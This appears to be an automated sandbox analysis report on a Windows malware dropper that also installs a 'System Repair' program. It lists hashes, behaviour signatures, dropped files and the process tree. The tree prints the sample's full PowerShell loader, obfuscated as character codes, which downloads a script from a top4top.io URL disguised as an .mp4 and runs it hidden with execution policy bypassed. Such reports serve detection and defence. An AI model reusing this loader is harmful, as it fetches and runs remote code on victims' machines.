Analysis

  • max time kernel: 141s
  • max time network: 120s
  • platform: windows7_x64
  • resource: win7-20240903-en
  • resource tags: arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
  • submitted: 29-12-2024 23:12

General

  • Target: A2AE35821B702B7B0FD434A54AFA836E69C20904664CE1ED4D3181BA2B8AA051.exe
  • Size: 17.7MB
  • MD5: a5b839089ce5953f0ea149c5d9fa2d7a
  • SHA1: 767b6cea8c1c3f892cc2bf20d1a63e52c0376c39
  • SHA256: a2ae35821b702b7b0fd434a54afa836e69c20904664ce1ed4d3181ba2b8aa051
  • SHA512: 0df01ca9702f52c8f41809a609d409da6f07f257ae05f6b379378213f1ce18ec00406fc8cc798b7cdf75c63ef763b973f57776bd7ed5d7ccf2457d486a1cdb3e
  • SSDEEP: 393216:iaB19LrFHgq7Pck/UibjnYPj77lYaDnHcqEhgAD:TPFHgKUk//rYPpYGHlqgm

Score
10/10

Malware Config

Extracted

  • Language: ps1
  • Deobfuscated: URLs
  • exe.dropper: https://i.top4top.io/m_1891i29ay1.mp4

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 4 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops file in Program Files directory 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

    Attempts to gather information about the system language of a victim host in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 25 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 19 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\A2AE35821B702B7B0FD434A54AFA836E69C20904664CE1ED4D3181BA2B8AA051.exe
    "C:\Users\Admin\AppData\Local\Temp\A2AE35821B702B7B0FD434A54AFA836E69C20904664CE1ED4D3181BA2B8AA051.exe"
    1⤵
    • Loads dropped DLL
    • Drops file in Program Files directory
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2308
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\IDXDS2021FR.vbs"
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:444
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EXECUTIONPOLICY REMOTESIGNED -COMMAND IEX ([System.Text.Encoding]::UTF8.GetString(@(65,100,100,45,84,121,112,101,32,45,65,115,115,101,109,98,108,121,78,97,109,101,32,77,105,99,114,111,115,111,102,116,46,86,105,115,117,97,108,66,97,115,105,99,13,10,91,83,116,114,105,110,103,93,32,36,80,97,116,104,32,61,32,91,77,105,99,114,111,115,111,102,116,46,86,105,115,117,97,108,66,97,115,105,99,46,73,110,116,101,114,97,99,116,105,111,110,93,58,58,69,110,118,105,114,111,110,40,34,84,69,77,80,34,41,32,43,32,34,92,83,121,115,116,101,109,83,101,99,117,114,105,116,121,51,50,46,80,83,49,34,13,10,91,77,105,99,114,111,115,111,102,116,46,86,105,115,117,97,108,66,97,115,105,99,46,73,110,116,101,114,97,99,116,105,111,110,93,58,58,67,97,108,108,66,121,78,97,109,101,40,40,78,101,119,45,79,98,106,101,99,116,32,83,121,115,116,101,109,46,78,101,116,46,87,101,98,67,108,105,101,110,116,41,44,32,34,68,111,119,110,108,111,97,100,70,105,108,101,34,44,32,49,44,32,32,64,40,39,104,116,116,112,115,58,47,47,105,46,116,111,112,52,116,111,112,46,105,111,47,109,95,49,56,57,49,105,50,57,97,121,49,46,109,112,52,39,44,32,36,80,97,116,104,41,41,13,10,91,83,121,115,116,101,109,46,84,104,114,101,97,100,105,110,103,46,84,104,114,101,97,100,93,58,58,83,108,101,101,112,40,49,48,48,48,48,41,13,10,73,69,88,32,34,80,111,119,101,114,83,104,101,108,108,46,101,120,101,32,45,69,120,101,99,117,116,105,111,110,80,111,108,105,99,121,32,66,121,112,97,115,115,32,45,87,105,110,100,111,119,83,116,121,108,101,32,72,105,100,100,101,110,32,45,70,105,108,101,32,36,80,97,116,104,34)))
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2808
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -File C:\Users\Admin\AppData\Local\Temp\SystemSecurity32.PS1
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2352
    • C:\Program Files (x86)\Advanced System Repair Inc\Advanced System Repair Pro\ASRInstaller.exe
      "C:\Program Files (x86)\Advanced System Repair Inc\Advanced System Repair Pro\ASRInstaller.exe"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      PID:452

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Local\Temp\$inst\0002.tmp
    Filesize: 1.5MB
    MD5: 63cbbef120a1f96e3586bffb970f44df
    SHA1: c354224093c565f009f373fceac05ec89f34c902
    SHA256: e99f7980cdb90e8365bdd66a1f889ed7c4c8858600861006d9b5d139b90ab020
    SHA512: 8b14df69399e00e384103c9b23d2868191b2e8576b0f24e927e334ca97cc31142d62e333d9776e5bae9e851a53dc6bb910090663abb4fae9b37f0e38a545877a

  • C:\Users\Admin\AppData\Local\Temp\SystemSecurity32.PS1
    Filesize: 232KB
    MD5: 7e9a5c74501529c97a0675dc7d3e36cc
    SHA1: c090ead740db008ed6bb1832c31065911103e349
    SHA256: c4facee5b8bdcb71ad41e600c454bb96a26fb4ab0888285e7182be1ed997b157
    SHA512: 81dfac6d2c9ff07078c4dd356b820c4479683f65f8610be5b010f012183141775d8b5e035f8f34e95cd28f4fd969db5abb3f00d410434d5900c7dba5fcda6716

  • C:\Users\Admin\AppData\Roaming\IDXDS2021FR.vbs
    Filesize: 153KB
    MD5: 2591c7f4c1ebca785ccb7c074f66782a
    SHA1: 080fa10f63666f48ed0136eb6dfbe5b914292668
    SHA256: d87330ce060e28593a0a7eb54b4191f83afed4772e63f6330d0be7312c02f5ec
    SHA512: 658e9d852a73bf2a2fa72e1d553958657a0abd32451c45477ba80dd16be4946c1f84c9d40cfb7a955b534f76c7bd0ec106400c53a62fcbb2b3d5401cdc4d44d6

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
    Filesize: 7KB
    MD5: 9ec4377ce720b399fd340dfaba30e420
    SHA1: c57ead9cf7b6cd3caa9a903be4cbf2bd18eebdfa
    SHA256: ec481e5b0ff0675d92918ec274b6aa05885945a906a3e9b25ed16a68fc31bf66
    SHA512: dc40135e0ad3a018cc8f344ee0c8583ad18d459bacc1cb3483fe229bdd4a526fa9218eba79e30323767d438e1a89fc7bedcaa26346d68da998bc6b5ce8cd32ef

  • \Program Files (x86)\Advanced System Repair Inc\Advanced System Repair Pro\ASRInstaller.exe
    Filesize: 18.0MB
    MD5: 8bbbcc401fc4d9834fa52d9cc98f9eef
    SHA1: 1aa753b405587c17852bcc447e39c6880498c5c0
    SHA256: c74c692354f9fc75e9cadf7c9d00756d40b5e6d100bb321260e2c29f7d13abb9
    SHA512: f3450fec6f4ae1cf3e22db11f5be2aa681a908de4bdfadcbd7fc0a08640e0c2fb9e40d607155f575cb4727b64f6dbb433fedaec67e117636cfaa6d8fcfd48ada

  • memory/2308-50-0x0000000000400000-0x0000000000432000-memory.dmp
    Filesize: 200KB